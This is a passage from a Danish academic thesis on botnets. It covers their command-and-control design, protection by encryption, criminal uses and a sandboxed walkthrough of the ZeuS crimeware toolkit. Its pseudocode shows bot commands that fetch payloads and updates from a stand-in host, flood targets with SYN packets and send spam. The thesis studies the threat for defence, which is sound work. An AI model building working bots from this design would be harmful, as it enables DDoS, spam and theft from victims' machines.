Det antages, at botnet-designeren i første omgang har udviklet en botnet-malware, som
succesfuldt har inficeret en række computere. Malwaren er designet således, at de enkelte
bots skal lytte til en specifik twitterkonto, hvis navn er inkluderet i kildekoden. Dette kunne
være som følgende:
twitterListener.addEventListener(“http://twitter.com/simplebotnet”);
command = twitterListener.startListen();
Ovenstående pseudokode etablerer den EventListener, der får de enkelte bots til at lytte efter
kommandoer fra twitterkontoen, som i dette eksempel vil være botnettets C&C-server. Botnetdesigneren skal derfor forinden have sørget for at oprette en twitterkonto, i dette tilfælde
under navnet simplebotnet, og dernæst tweete de ønskede kommandoer til botnettet.
Det antages, at twitterListener.startListen() er en proces, der tillader malwaren at køre skjult i
baggrunden. Dette vil sige, at når der oprettes nye tweets på twitterkontoen, bliver de pushed
ud til de forskellige bots, hvor Deres EventHandler vil opfange beskeden og udføre den
ønskede kommando. Pseudokoden er som følger:
Input: command[]
EventHandler.begin
switch command[1]
case spread:
target[] = gatherEmails(localhost)
content = getContent(http://botmaster.com/spread.txt)
for each t in target[]
smtpSend(t,content)
case ddos:
target = command[2]
duration = command[3]
timeToStop = getTime() + duration
while timeToStop > getTime() do
SYNFlood(target)
case spam:
targets = command[2]
content = command[3]
foreach t in targets do
smtpSend(t,content)
case update:
newVersion = command[2]
filePath = command[3]
if currentVersion() < newVersion then
code = downloadCode(filePath)
applyCode(code)
EventHandler.end
ITU
19
Et tiltænkt eksempel kunne være, at botmasteren i første omgang ønsker at opdatere sine
bots inden et større DDoS-angreb, for at sikre at alle bots har den nyeste malware. I dette
tilfælde vil botmaster starte med at tweete en ny besked som for eksempel: <update 1.3
http://botmaster.com/update_1_3.exe>.
Dette vil få alle bots, der endnu ikke har version 1.3 af
botnettet til at downloade den nye opdatering og installere den.
Nu da alle bots er korrekt opdateret, ønsker botmaster at udføre et DDoS-angreb som resultat
af en bestilling fra en kunde. Kunden ønsker at botmaster benytter sit botnet til at angribe et
konkurrerende firmas hjemmeside, således at hjemmesiden er utilgængelig til fordel for
kunden. Botmaster tweeter derfor en ny besked, <ddos http://www.competitor.com 24>, hvilket vil
sætte alle bots til at lave et SYN FLOOD-angreb rettet mod webserveren på den angivne
adresse. Hver enkelt TCP SYN-pakke vil optage en lille del af serverens ressourcer, og såfremt
mængden af bots er tilstrækkelig stor, vil belastningen af serveren være så høj, at botnettet
tvinger den offline. Kunden vil, såfremt udførelsen var tilfredsstillende, betale for den udførte
handling, og botmasteren kan igen lade sine bots hvile, indtil de igen skal benyttes.
Da botnet-beskyttelse ikke er implementeret i ovenstående eksempel, er det nærtliggende at
forestille sig at C&C-serveren opdages af enten Twitter.com, eller andre der vil rapportere
misbrug af Twitter. Antages det, at et firma som for eksempel McAfee vil undersøge og
eventuelt stoppe truslen, kunne man forestille sig, at de med samarbejde fra Twitter får
adgang til twitterkontoen og lukker botmasteren ude, for eksempel ved at ændre password.
McAfee vil nu kunne tweete en ny besked, som vil kunne nedlægge botnettet. Dette kunne for
eksempel være ved at udsende en opdatering, som vil afinstallere malwaren fra computeren,
eksempelvis <update 1.4 http://mcafee.com/disarm.exe>. De enkelte bots vil tro, at der er kommet
en ny version af malwaren og herefter downloade og eksekvere den kode, der afinstallerer
botnet-malwaren og dermed eliminerer truslen.
Som tidligere nævnt er ovenstående en simplificeret udgave af, hvorledes botnets kan bygges
op uden omtanke på botnet-beskyttelse. Der findes en række foranstaltninger, der vil kunne
beskytte imod ovenstående scenarie samt andre former for botnet-bekæmpelse, hvilket
beskrives i næste afsnit.
Daniel Jovanovic
20
3.5 Hvordan beskytter botnet sig selv
Grundet det fokus der er på botnets, opstod der et behov for at kunne beskytte disse mod de
trusler, der eksisterer. En trussel kunne for eksempel stamme fra botnet-bekæmpere som
nævnt i forrige afsnits scenarie, der ønsker at afvæbne botnettet og rense ofrenes computere.
Derudover kunne truslen også være fra andre kriminelle, som kunne have interesse i at
udnytte og gøre uretsmæssigt brug af botnettet. Dette kunne være i form af kriminelle der
benytter et botnet, til mere end de har betalt for, eller kriminelle der forsøger at overtage
kontrollen over hele botnettet. Botnet-designere måtte derfor implementere en form for
beskyttelsesmekanisme mod disse trusler. Dette kan blandt andet opnås ved hjælp af
kryptering.
Det er først og fremmest vigtigt, at de enkelte bots er i stand til at verificere, at kommandoen
er autentisk og stammer fra botmasteren. Derudover skal de enkelte bots også være sikre på
at integriteten er intakt, og at der ikke er lavet om i beskeden under transmitteringen. Dette
kan opnås ved hjælp af asymmetrisk kryptering, hvor botmaster indledningsvis genererer en
offentlig og en privat nøgle, for eksempel ved hjælp af RSA. Den offentlige nøgle inkluderes i
malwaren, der inficerer de forskellige bots. Den offentlige nøgle ligger derfor lokalt på hver
enkelt computer. Når kommandoer skal udstedes til botnettet, genererer botmasteren først en
HASH-værdi af beskeden og krypterer denne med den private nøgle. Denne krypterede
besked, kaldet en digital signatur, vedhæftes nu den oprindelige besked. Når de enkelte bots
modtager beskeden og den digitale signatur, tager de beskeden og generer HASH-værdien ved
hjælp af samme algoritme, som er aftalt på forhånd. Herefter benyttes den offentlige nøgle til
at dekryptere den digitale signatur, og man kan herefter sammenligne de to HASH-værdier.
Stemmer de overens, kan det verificeres, at kommandoen stammer fra botmaster, og at
integriteten ikke er brudt undervejs. Dette sikrer, at botnetbekæmpere eller andre kriminelle
ikke kan overtage eller afvæbne det aktuelle botnet ved at sende beskeder i botmasters sted.
Botnet-designere kan også ønske at kryptere selve indholdet af kommandoen, så andre parter
ikke kan lytte med på kontrolkanalen. Botnettet Waledac benytter et princip, hvor alle nye bots
først skal etablere en sessionsnøgle, der fremover skal bruges i al fremtidig kommunikation
med C&C-serveren [7]. Dette sker, ved at botten generer et RSA asymmetrisk nøglepar lokalt
på computeren med en public key PKbot og en secret key SKbot. Botten sender nu et X.509certifikat til serveren med bottens PKbot nøgle i et XML dokument, der er komprimeret med
bzip2 og AES-krypteret med en 128 bit nøgle, som er integreret i den oprindelige Waledac
kildekode. Serveren returnerer derefter sessionsnøglen til botten, krypteret med bottens
offentlige nøgle, PKbot. Grundet funktionaliteten af asymmetrisk kryptering er det kun botten,
ITU
21
der kan dekryptere en besked, der er krypteret med den offentlige nøgle. Fremtidig
kommunikation mellem bot og C&C-server kan nu krypteres med sessionsnøglen og forblive
fortrolig. AES-nøglen kan findes ved grundig analyse af kildekoden, men sessionsnøglen vil
ikke kunne findes af andre parter, så længe det matematiske problem benyttet i RSA,
faktorisering af store primtal, er tilstrækkeligt svært.
Med Conficker-botnettet, der havde sin første variant i 2008, sås også en stigende
kompleksitet indenfor botnet-beskyttelse. Der blev inkorporeret mekanismer, der deaktiverede
de sikkerhedsprodukter, der ellers ville slette Conficker-malwaren fra de inficerede computere
herunder også deaktivering af Windows Update og safeboot mode. Herefter overvågede
malwaren konstant computeren, så den kunne reagere hvis der eventuelt blev installeret nye
sikkerhedsprodukter, hot fixes eller andre diagnosticeringsværktøjer der udgjorde en trussel
mod malwaren [25]. I forbindelse med kontrolkommunikationen genererede de enkelte bots
dagligt nye domænenavne til deres såkaldte internet rendevouz, hvor botten kunne forespørge
efter opdateringer eller kommandoer. Botmaster skulle blot sørge for at have registreret ét
eller flere af disse domæner og på denne hoste de aktuelle filer eller kommandoer til botnettet.
Disse domænenavne genereres efter de enkelte bots system clock, ved hjælp af algoritmer der
sikrer at der generes det samme sæt af domænenavne på alle bots [25].
Daniel Jovanovic
22
Kapitel 4
Kriminalitet og botnets
Dette kapitel beskriver, hvorledes kriminalitet og botnets hænger sammen. Kapitlet indledes
med den kriminelle udvikling i forbindelse med botnets, for at fastlægge hvor modent botnets
kan siges at være i forhold til det kriminelle spektrum. Herefter inddeles botnet-kriminalitet i
tre kategorier, som hver især har forskellige motiver og mål for angreb. Disse er berigelsesforbrydelser, hacktivism og cyber warfare. En sammenfatning slutter af med at diskutere, hvor
alvorlig truslen egentlig er.
4.1 Botnets kriminelle udvikling
Botnets anses i dag som værende en af de mest kritiske trusler på internettet [13]. Botnets
benyttes som værktøj i flere kriminelle henseender, herunder informationstyveri, spredning af
malware, angreb og lammelse af informationssystemer osv. Disse må siges at være udviklet
over tid, i takt med at botnets potentiale som værktøj til kriminalitet blev indset og udnyttet af
forskellige bagmænd. Det antages, at de første botnets mål var at tilegne sig adgang til
ofrenes ressourcer og dermed skabe en samling af computere, vis kapacitet stod til rådighed
for bagmændene. Med tiden blev der opdaget nye motiver, der i større omfang forøgede de
muligheder, bagmændene havde med de inficerede computere, herunder hvordan disse kunne
udnyttes til at skabe en illegal industri.
I 1999 blev der opdaget former for malware, man ikke før havde set, herunder Sub7, der var
en trojansk hest og Pretty Park, som var en orm [13]. Begge disse benyttede sig af designprincippet, hvor de oprettede forbindelse til en central IRC-server, hvor de lyttede efter og
udførte kommandoer fremsagt af botnet-bagmændene. Af andre eksempler fra samme tid sås
Trinoo og TFN, som begge blev brugt som DoS-værktøjer, samt Stacheldraht som byggede på
begge de foregående. Stacheldraht benyttede sig af flere DoS-mekanismer, herunder SYN og
ICMP flood til at angribe deres mål. Kommunikationen foregik via TCP og blev krypteret ved
hjælp af Blowfish-algoritmen [26]. I år 2000 kom GTbot, som byggede på IRC-klienten mIRC.
Denne havde blandt andet mulighed for at oprette og benytte TCP og UDP sockets til at udføre
DoS-angreb. Udviklingen fortsatte, og i 2002 kom SDBot frem med mange af de samme
ITU
23
funktioner som tidligere set. På grund af dets simple, dog effektive C++ kode, videregav
botnet-designeren koden med en formodet økonomisk gevinst, hvilket er grunden til, at SDBot
nu kan ses i mange forskellige varianter med forskellige ondsindede hensigter [13]. Samme år
opdagede man Agobot der introducerede en fase-baseret inficering på tre faser. Første fase
var en installation af en bagdør, dernæst et forsøg på at deaktivere eventuelle antivirusprogrammer og sidst et forsøg på at blokere for hjemmesider fra kendte antivirus-producenter.
Senere i år 2003 udviklede SDBot sig til Spybot og kunne nu foretage data mining på de
inficerede computere, som for eksempel indsamling af tastetryk via keylogging-værktøjer.
I årene omkring 2003 og 2004 opstod der en indsigt i, hvorledes botnets kunne anvendes til at
opnå en økonomisk gevinst ved hjælp af spam. I 2004 kom de første spam-botnets, Bagle og
Bobax [13]. Disse tillod botnet-bagmændene at bygge botnets med stor spam-kapabilitet, og
dermed mulighed for at ramme en større mængde computere. Ved at benytte botnets til at
sende spam undgik botnet-bagmændene i større grad risikoen for at blive opdaget og
retsforfulgt, og de havde mulighed for at opnå større fleksibilitet med hensyn til ofrene.
I 2006 blev Zeus-botnettet opdaget. ZeuS blev primært brugt til at indhente information fra de
inficerede computere, herunder brugernavne og kodeord til diverse betalingstjenester og
lignende [19]. Grundet ZeuS’ effektivitet og brugervenlighed blev det anset som værende et af
de mest populære botnets blandt kriminelle, og de nyeste versioner af botnettet blev solgt for
betydelige summer i den kriminelle undergrund, hvor ældre og light-udgaver uden de nyeste
funktioner blev solgt billigere eller frigivet gratis i visse miljøer [13]. Efterfølgende dukkede
andre botnets op som Storm, Waledac og Conficker, alle sofistikerede udgaver der tyder på
mere dedikerede ressourcer til rådighed, i en mere organiseret grad.
Der viser sig altså en tendens for, at det primære mål med hacking og herunder botnets er
gået fra at være vandalisme, hærværk samt anerkendelse i hacker-undergrunden til at være
mere organiseret og oftest med en specifik og fokuseret agenda. Det er derfor klart, at botnet
må siges at være en teknologi, der kan bruges på flere måder med forskellige formål, og at det
i høj grad er vidt forskellige ressourcer, der står bag udarbejdelsen samt eksekveringen af
botnets som helhed. Dette speciale inddeler disse tre overordnede hensigter efter berigelsesforbrydelser, hacktivism og cyber warfare.
Daniel Jovanovic
24
4.2 Berigelsesforbrydelser
Det er efterhånden blevet klart, at mulighederne med botnets er store. Med kreativitet og
planlægning kan botnet-bagmænd udnytte botnettet til at begå kriminalitet med fokus på at
skabe en økonomisk gevinst. Dette kan anses som værende et alternativ til traditionel
organiseret kriminalitet, som for eksempel narkotikahandel eller prostitution. Det betragtes
som et mindre risikabelt alternativ til traditionel kriminalitet, da botnet-bagmændene ikke
nødvendigvis er direkte involveret og kan gøre brug af flere mellemled, som for eksempel
proxy-servere, der eventuelt er placeret i flere forskellige lande.
En velkendt metode for botnet-bagmænd til at skabe økonomisk gevinst er at afpresse
virksomheder ved hjælp af deres botnet. Dette forløber ved, at botnet-bagmændene kontakter
virksomhedsejere og informerer dem om, at deres side er under angreb. Som oftest har ofrene
kun to valgmuligheder, enten at betale en sum penge til bagmændene, eksempelvis via
Western Union, eller at undlade at betale og dermed lade angrebet fortsætte. Som med
konventionel afpresning, set i den fysiske verden, ses det, at kommunikationen er velovervejet, ligesom at det påkrævede beløb befinder sig på grænsen af, hvad offeret er villig til
at betale i forhold til at lade angrebet fortsætte. Forretningsdrivere på nettet vil i denne
forbindelse se nedetid som tabt omsætning, hvilket kan give incitament for at betale
løsesummen.
I et eksempel fra 2003 hvor en online gamblingtjeneste blev udsat for sådan et angreb, havde
bagmændene beregnet og specificeret, at det ville være billigere at betale denne løsesum end
at lade siden gå offline og miste potentielle kundetransaktioner [28]. Botnet-bagmændene
havde været nøjeregnende og lagt denne afpresning op til, hvad der af gamblingtjenester
bliver betragtet som højsæson, hvilket derfor var ekstra kritisk for offeret. I dette tilfælde
valgte ejeren dog ikke at betale og tog i stedet kampen op imod botnet-bagmanden. Som
truslen forudsagde, blev siden lagt ned via et DDoS-angreb og offeret mistede ganske rigtigt
flere penge ved at være offline, end hvis løsesummen var blevet betalt. Sagen endte dog med,
at angrebet efter nogen tid blev stoppet ved hjælp af trafikfiltrering, og at botnet-bagmanden
blev sporet og arresteret i Rusland [28]. Samme historie melder dog også om, at andre ofre
har været udsat for lignende angreb og valgt at betale løsesummen og dermed givet
bagmændene en økonomisk gevinst samt incitament til at fortsætte. Virksomheder der har
været udsat for dette, vælger ikke altid at stå frem i offentligheden, da det kan være et dårligt
signal at sende til virksomhedens interessenter.
ITU
25
En anden metode der er aktuel i forbindelse med berigelsesforbrydelser er såkaldte spambotnets. Disse bygger på, at man med mange botnet-medlemmer kan sende mange spammails ud på kort tid. Ydermere er det som tidligere nævnt en stor fordel, at spam-udsendelse
ikke sker fra bagmændenes egne computere, da botnet-bekæmpere ellers ville have nemmere
ved at spore bagmændene. Da spam blandt andet reklamerer for produkter og services, der
kan købes online, kan bagmænd benytte dette til at få eksponeret deres forretning til en større
gruppe mennesker end ved konventionel markedsføring. Hvad enten det reklamerede produkt
eksisterer eller blot er bedrageri, hvor Social Engineering anvendes til at lokke penge ud af
ofrene, må det anses som værende en lukrativ forretning for bagmændene. Grundet det fokus
der er skabt på spam i dag, er det nok de færreste der reagerer på denne form for markedsføring, men det betyder ikke så meget for bagmændene. Da spam, som tidligere nævnt,
udsendes på en så stor skala, kræves der kun, at en ganske lille procentdel reagerer og
eventuelt forsøger at købe det reklamerede produkt, for at botnet-bagmændene kan skabe en
økonomisk gevinst.
Botnet-bagmænd kan også skabe økonomisk gevinst ved hjælp af informationsindsamling. Da
botnet er en samling af malware-inficerede computere, kan denne malware designes til at
indhente vigtige informationer fra de enkelte computere og rapportere dem tilbage til botnetbagmanden. Disse informationer kunne eksempelvis være brugernavne og adgangskoder til
betalingstjenester eller webbank, indhentet ved hjælp af eksempelvis keylogging. Botnetbagmændene kan nu anvende denne information til at stjæle penge fra ofrene og eventuelt
forsøge at hvidvaske pengene igennem money mules i forskellige lande. Dette speciale
behandler en specifik case med denne form for berigelsesforbrydelse, som kan ses i kapitel 5.
Endelig ses det, at nogle af disse botnets lejes ud mod betaling. Der er altså tale om en form
for service, der udbydes, og derfor defineres som crime-as-a-service. Botnet-bagmændene
kan igennem kanaler, som er holdt hemmelige, udbyde deres botnet til leje til personer der
igennem anerkendelse i den kriminelle undergrund har fået adgang til kanalen. Der kræves
altså på dette område en stor tillidsopnåelse, da botnet-bekæmpere ellers nemt ville kunne få
adgang til vigtige spor og information om nutidens store botnets og dermed eventuelt ville
kunne lukke dem. Det antages, at denne form for anerkendelse og tillid opnås ved at begynde
på hacker-undergrundshjemmesider, som for eksempel ghostmarket.net før den blev lukket,
ved at vise sit værd som it-kriminel igennem flere niveauer.
Daniel Jovanovic
26
Et eksempel på et botnet til leje kan ses på dette skærmbillede, der er taget af sikkerhedsorganisationen Damballa [24].
Figur 7. Eksempel på botnet der udbydes til leje online. Kilde [24].
Som man kan se på ovenstående billede, udbydes kapaciteten af det aktuelle botnet til leje på
internettet fra $200 for 24 timer. Botnet-bagmanden garanterer, at enhver hjemmeside kan
nedlægges, og at man kan få en tre minutters gratis demonstration, inden man bestiller
servicen. En annonce der på mange områder minder om services, der udbydes i den legale
verden, hvilket bekræfter, at botnet er blevet en organiseret og illegal industri.
ITU
27
4.3 Hacktivism
Normalt forsøger it-kriminelle at holde sig skjult og undgå for meget opmærksomhed for ikke
at blive opdaget. Det direkte modsatte af dette kaldes hacktivism, der defineres som aktivisme
udført med hackermetoder [35]. Her forsøger hackere netop at skabe opmærksomhed om en
sag, ofte med fokus på at opnå en social eller politisk forandring. Da botnets er et vigtigt
værktøj i hackeres våbenarsenal, bliver sådanne også benyttet i forbindelse med udførelse af
hacktivism.
De nok mest velkendte eksempler på hacktivism stammer fra gruppen Anonymous, som er en
internetbaseret aktivistgruppe, der blandt andet kæmper for frihed på internettet. Gruppen
fungerer uden en egentlig leder og må siges at have anarkistiske træk. De er særligt kendte
for at støtte WikiLeaks og The Pirate Bay, da de alle til en vis grad har fælles holdninger med
hensyn til internettet. I gruppen indgår specialister inden for it-sikkerhed, der menes at have
ekspertisen samt værktøjerne til at kunne udføre angreb på, hvad de ser som trusler mod
ytringsfriheden på internettet, eller andre sager de måtte ønske at påvirke. Dette er blevet
demonstreret i flere sager, for eksempel i år 2008 hvor Anonymous blandt andet benyttede et
botnet til DDoS-angreb mod The Church of Scientology’s hjemmeside. Dette skete på grund af,
at en intern video fra Scientology blev lækket på YouTube, og derefter fjernet igen efter krav
fra Scientology på grund af brud på ophavsretten. Anonymous udtalte, at angrebet blev udført
for at beskytte ytringsfriheden, og i øvrigt for at stoppe hvad de anser som økonomisk
udnyttelse af scientology-medlemmer [29]. I starten af år 2012 har de yderligere annonceret
et nyt mål, kaldet Operation Europe, #opeurope, som har til formål at bevise, at der også
eksisterer korruption i europæiske lande. Operationen har fokus på skoler, universiteter og
andre statslige institutioner i især Grækenland, Schweiz, Tyskland, Holland, Italien og
Danmark.
Det kan diskuteres, om Anonymous i dag nærmere skal karakteriseres som en bevægelse frem
for en gruppe, da der eksisterer store og ustrukturerede grupperinger af mennesker, der alle
er klar til at støtte Anonymous’ overordnede sager. I forbindelse med de angreb der fokuser på
at nedlægge hjemmesider, gør Anonymous brug af et værktøj kaldet, Low-Orbit-ION-Cannon.
LOIC er et open source-værktøj, som frit kan hentes fra internettet, og som ved eksekvering
tillader alle der måtte ønske det frivilligt at deltage i et botnet, som kan blive brugt til DDoSangreb. Dette er et glimrende og interessant eksempel på, hvordan Anonymous-bevægelsen er
i stand til at motivere deres tilhængere til at stå sammen i en fælles sag og i dette tilfælde at
bidrage til ulovlig botnet-aktivitet for at opnå et fælles politisk eller ideologisk mål.
Daniel Jovanovic
28
4.4 Cyber warfare
Cyber warfare skal ses som et alternativ til konventionel krigsførelse, hvor et mål angribes
med fysiske midler. I takt med at menneskers infrastruktur digitaliseres i højere grad og
eventuelt opkobles på internettet, opstår der en ny trussel i forbindelse med cyber warfare.
Cyber warfare kan beskrives som en nations ønske om at penetrere en anden nations
computersystemer eller netværk med det formål at spionere, forstyrre eller nedlægge et
elektronisk mål. Da der er tale om et alternativ til konventionel krigsførelse på nationsniveau,
kan der antageligt tildeles store ressourcer og dermed udvikles sofistikerede og komplekse
angrebsmekanismer samt malware.
I år 2007 blev Estland udsat for et elektronisk angreb. Baggrunden for dette var, at Estlands
regering flyttede en mindestatue fra den sovjetiske befrielse af det nazi-okkuperede Estland til
et mindre prominent og synligt sted [21]. Dette resulterede i fysiske optøjer, men mere
interessant for dette speciale også i elektroniske angreb. Målene for disse angreb var Estlands
økonomiske og politiske infrastruktur, herunder alle ministeriers hjemmesider, to større
banker, flere politiske partiers hjemmesider samt parlamentets e-mail-servere. Disse blev lagt
ned ved hjælp af DDoS-angreb fra ukendte botnet-bagmænd. Estland anklagede Rusland for at
stå bag disse angreb, selvom EU og NATO’s tekniske eksperter ikke har været i stand til at
bekræfte dette. Det kan dog diskuteres, om uorganiserede hackere kan have haft midlerne til
at eksekvere et sådant angreb, og det er derfor ikke urealistisk at forestille sig, at angrebet
kunne stamme fra, eller være hjulpet på vej, af Ruslands regering og derfor klassificeres som
cyber warfare. En hypotese der understøttes af, at tidligere politiske, såvel som fysiske
sammenstød mellem Rusland og Estland må siges at have fundet sted [21].
Et andet eksempel på cyber warfare kan siges at være angrebet på Iran ved hjælp af Stuxnet.
Stuxnet er en malware, der er designet til at ramme industrielle kontrolsystemer,
sandsynligvis specifikt i Iran, med fokus på at omprogrammere de PLC’ere der benyttes heri.
Stuxnet er af flere blevet kaldt en af de mest komplekse malware der endnu er set og benytter
flere forskellige spredningsvektorer for at nå sit mål. Herunder zero-day-sårbarheder, Windows
rootkit, PLC rootkit, antivirus-undvigelsesteknikker samt botnet-egenskaber som P2Popdateringer og C&C-styring [20]. Det menes, at Stuxnet blev udviklet til at ramme Irans
atomprogram og nedlægge eller forsinke dette. På trods af at det ikke er blevet bevist, menes
dette angreb at stamme fra den israelske regering, sandsynligvis i samarbejde med USA.
ITU
29
Disse eksempler har skabt fokus på elektroniske angreb på infrastruktur som del af en åbenlys
eller skjult krigsførelse. Ovenstående angreb har overrasket mange, og i fremtiden kan man
forestille sig, at internettet vil blive yderligere anvendt som værktøj til sabotage eller direkte
krigsførelse, der ønsker at ramme nationers kritiske infrastruktur, som for eksempel vandforsyning, elektricitet, trafiksignaler, våbenprogrammer osv. Man kan derfor forestille sig, at de
enkelte nationer har et ønske om at opruste for at være beredt på fremtidens cyber warfare.
I en rapport fra Forsvarets Materieltjeneste, sektion for Anvendt Forskning, beskrives en vision
om at oprette en selvstændig dansk militær-kapabilitet kaldet Computer Network Operations,
CNO [9]. Denne skal bestå af tre delkapabiliteter: Computer Network Attack (CNA), Computer
Network Exploitation (CNE) og Computer Network Defence (CND). Hver af disse har deres
egne operative mål samt værktøjer til at opnå målene.
Figur 8. Tabel over CNO’s forskellige delkapabiliteter. Kilde [9].
Som man kan se, består CNA af de direkte angreb på nationers IT. Dette er den øjensynligt
mindst udviklede kapabilitet, da det er et forholdsvist nyt område i forhold til ønsket om at
beskytte sine it-værdier. Det er i dette tilfælde nationers opgave at benytte teknikker og
malware på samme niveau, som er set hos hackere. Et oplagt eksempel er udførelsen af et
Daniel Jovanovic
30
DDoS-angreb ved hjælp af botnet, for at lamme modstanderens it-infrastruktur. Med en
nations opbakning kan dette dog kaldes cyber warfare og dermed eventuelt retfærdiggøres.
CNE kan have visse overlap eller sammenhænge med CNA, da det består i at opnå kendskab
til en modstanders IT. Den information der indhentes, benyttes til at klargøre eller muliggøre
et efterfølgende CNA-angreb eller blot til at indhente efterretninger om modstanderen. CND er
nok den eneste af kapabiliteterne, der er udviklet i en sådan grad, at der eksisterer off-theshelf-produkter, der kan opfylde målene, forstået ved at der findes deciderede kommercielle
værktøjer, som kan erhverves til at beskytte sine it-værdier, se også afsnit 6.6. Dog er der i
forbindelse med cyber warfare højst sandsynligt anvendt specialudviklede værktøjer, således
at modstandere ikke på forhånd kan undersøge eventuelle sårbarheder og dermed lære at
misbruge dem. Kompetencer samt beredskab i ovenstående enheder må anses som en
nødvendighed for at kunne gebærde sig på den kommende digitale slagmark.
4.5 Sammenfatning
Det er blevet klart, at botnets udgør en trussel både i forbindelse med økonomisk kriminalitet,
men også med henblik på sabotage og som værktøj til angreb på kritisk infrastruktur. I år
2010 arresterede det amerikanske Secret Service 1.200 mistænkte for it-kriminalitet. De
omhandlende sager drejede sig blandt andet om økonomisk bedrageri, hvor der tilsammen
blev forsøgt stjålet $7 milliarder, hvoraf $500 millioner er tabt og mistet [12]. Det fremgår
ikke, hvor mange af disse penge der er mistet på grund af botnet-aktivitet, men eftersom det
er et effektivt værktøj, må det antages, at det er en stor del. Ligeledes er set eksempler på
hvordan botnet og DDoS-angreb kan benyttes til at lamme infrastruktur, for eksempel set i
Estland i 2007, og hvordan det kan benyttes som sabotage eller værktøj til at fremtvinge et
politisk budskab.
Botnet-aktivitet må altså konkluderes som værende et yderst vigtigt emne, som bestemt skal
tages seriøst. Der er ikke blot tale om endnu en type malware, som kan irritere systemadministratorer eller brugere af computere. Botnet bør ses som et våben, der kan true vores
moderne samfund. Der er ikke kun store summer penge på spil, men også samfundets drift og
funktionalitet. Der er endnu ikke set direkte tilfælde på, at kritisk infrastruktur som elektricitet,
vandforsyning osv. er angrebet af botnets, men det kræver ikke megen fantasi, at forestille sig
de konsekvenser det kunne have for et moderne samfund, der i stigende grad bliver online.
Det er derfor vigtigt, at der forskes i bekæmpelsen, og at der initieres de nødvendige tiltag for
at mindske botnet-kriminalitet.
ITU
31
Kapitel 5
Case: ZeuS Crimeware Toolkit
Dette kapitel tager udgangspunkt i Zeus Crimeware Toolkit som en case, med det formål at
illustrere hvor simpelt botnet-designere har gjort det for kriminelle at drive deres eget botnet.
Ved hjælp af litteratur samt specialets egne undersøgelser og observationer analyseres ZeuS
som helhed. Der opstilles efterfølgende en hypotese om den forretningsmodel, der eksisterer
bag ZeuS, som begrundes i empiri.
I maj 2011 blev den daværende version af kildekode til ZeuS-botnettet lækket på internettet,
samt det dertilhørende Crimeware Toolkit [22]. På grund af ZeuS’ effektivitet samt det brugervenlige Crimeware Toolkit blev botnettet set af mange som værende et af de mest populære
botnets blandt hackere og samtidig det mest frygtede blandt banker og andre pengeinstitutter.
I 2009 blev ZeuS i en undersøgelse vurderet som det farligste og bedste botnet, med 3,6
millioner inficerede computere alene i USA, hvilket svarede til 19 pct. af alle pc’er i USA [19].
Samme undersøgelse viste yderligere, at ZeuS stod for 44 pct. af alle bank-relaterede
hændelser, hvilket gør det til en stor og aktuel trussel.
5.1 Hands-on med ZeuS Crimeware Toolkit
Det medfølgende Crimeware Toolkit kan bruges, til at tilpasse ZeuS-malwaren til at indhente
de informationer bagmændene ønsker fra de inficerede computere. ZeuS bruges som ofte til at
stjæle oplysninger fra webbank, kontonumre og kreditkortinformationer, eller hvad botnetbagmændene ellers måtte ønske, der efterfølgende kan sælges på det sorte marked [19].
Brugervenligheden er høj, og der medfølger en manual, se uddrag fra denne i appendiks 10.5,
som var det et hvilket som helst andet stykke legalt software. Toolkittet er delt op i en række
elementer, der til sammen udgør hele botnettet.
Daniel Jovanovic
32
Versionen der analyseres i dette speciale, version 2.0.8.9 lækket maj 2011, består overordnet
set af tre hovedelementer:

Et kontrolpanel udarbejdet i PHP, der styres via en browser og kommunikerer med en
dertilhørende MySQL-server.

Konfigurationsfiler, herunder config.txt, hvor man kan specificere sine overordnede
oplysninger, samt webinjects.txt hvor man beskriver, hvilke hjemmesider der skal
registreres oplysninger fra via webinjects.

En såkaldt ZeuS Builder, der bruger de føromtalte konfigurationsfiler til at generere en
samlet konfigurationsfil kaldet config.bin, som efterfølgende bruges til at generere selve
malwaren, der kaldes bot.exe.
For at undersøge de forskellige elementer af ZeuS crimeware toolkit er der opstillet et virtuelt
sandbox miljø ved hjælp af Oracle’s VirtualBox, da udpakningen af filerne ellers ville medføre
følgende advarsel:
Figur 9. Antivirus advarsel angående ZeuS-malwaren Zbot.
Desuden eksisterer der en mulighed for, at der i Crimeware toolkittet er indlagt en bagdør,
således at alle der selv har forsøgt sig med ZeuS, måske bliver medlem af et nyere ZeuSbotnet eller får en anden form for malware på deres computere.
I øvrigt anses det som værende best-practice, at analyse af malware altid bør foregå under
kontrolleret forhold, da man som udgangspunkt ikke kender konsekvenserne samt
spredningsvektorerne i malwaren.
ITU
33
Det virtuelle sandbox-miljø er i dette tilfælde en Windows XP installation med service pack 2,
dog uden yderligere opdateringer. Der er derudover ingen antivirus-programmer eller firewall
installeret. På den virtuelle maskine er opsat en lokal webserver, nærmere betegnet en Apache
server med MySQL og PHP understøttelse, hvor C&C-server-filerne er lagt op. Installationen af
C&C-serveren sker herefter nemt ved hjælp af et installations-script, der i dette tilfælde tilgås
på adressen http://127.0.0.1/server/index.php. Dette åbner installationsmenuen som set på
nedenstående figur, der hjælper med at installere kontrolpanelet og databasen.
Figur 10. ZeuS installationsmenu.
Som man kan se, skal man blot indtaste de nødvendige informationer i inputboksene, og
installations-scriptet klarer derefter resten. Databasen, der oprettes automatisk under
installationen, anvendes til at lagre informationer om botnettet, samt de rapporter de enkelte
bots leverer tilbage fra de inficerede computere, se appendiks 10.4 for et skærmbillede.
Når installationen er fuldført bliver brugeren præsenteret for en login-menu, hvor man skal
indtaste brugernavn og password. Disse blev valgt under installationen, men der kan senere i
kontrolpanelet også oprettes flere konti til andre brugere. På denne måde kan botmaster holde
styr på hvem der har adgang til botnettet.
Daniel Jovanovic
34
Kontrolpanelet, der kan tilgås via en webbrowser, giver et brugervenligt overblik over
indholdet af databasen samt mulighed for at opsætte og kommunikere med resten af botnettet
via PHP scripts. Nu mangler man blot at generere malware-filen og sprede denne.
Figur 11. ZeuS kontrolpanel.
Den medfølgende ZeuS Builder er et program, der ved eksekvering åbner en brugergrænseflade, der ser således ud:
Figur 12. ZeuS Builder program.
Som man kan se på ovenstående figur, skal man i brugergrænsefladen blot vælge lokaliteten
på konfigurationsfilen config.txt, og dernæst kan malwaren generes automatisk ved at trykke
på to knapper. Konfigurationsfilen består af både statiske konfigurationer, som benyttes, når
computere i første omgang bliver inficeret og skal logge på botnettet, og af dynamiske
ITU
35
konfigurationer som kan ændres, hvis botten eksempelvis skal ændre adfærd undervejs, se et
eksempel i appendiks 10.6. Under den dynamiske konfiguration henvises til en fil kaldet
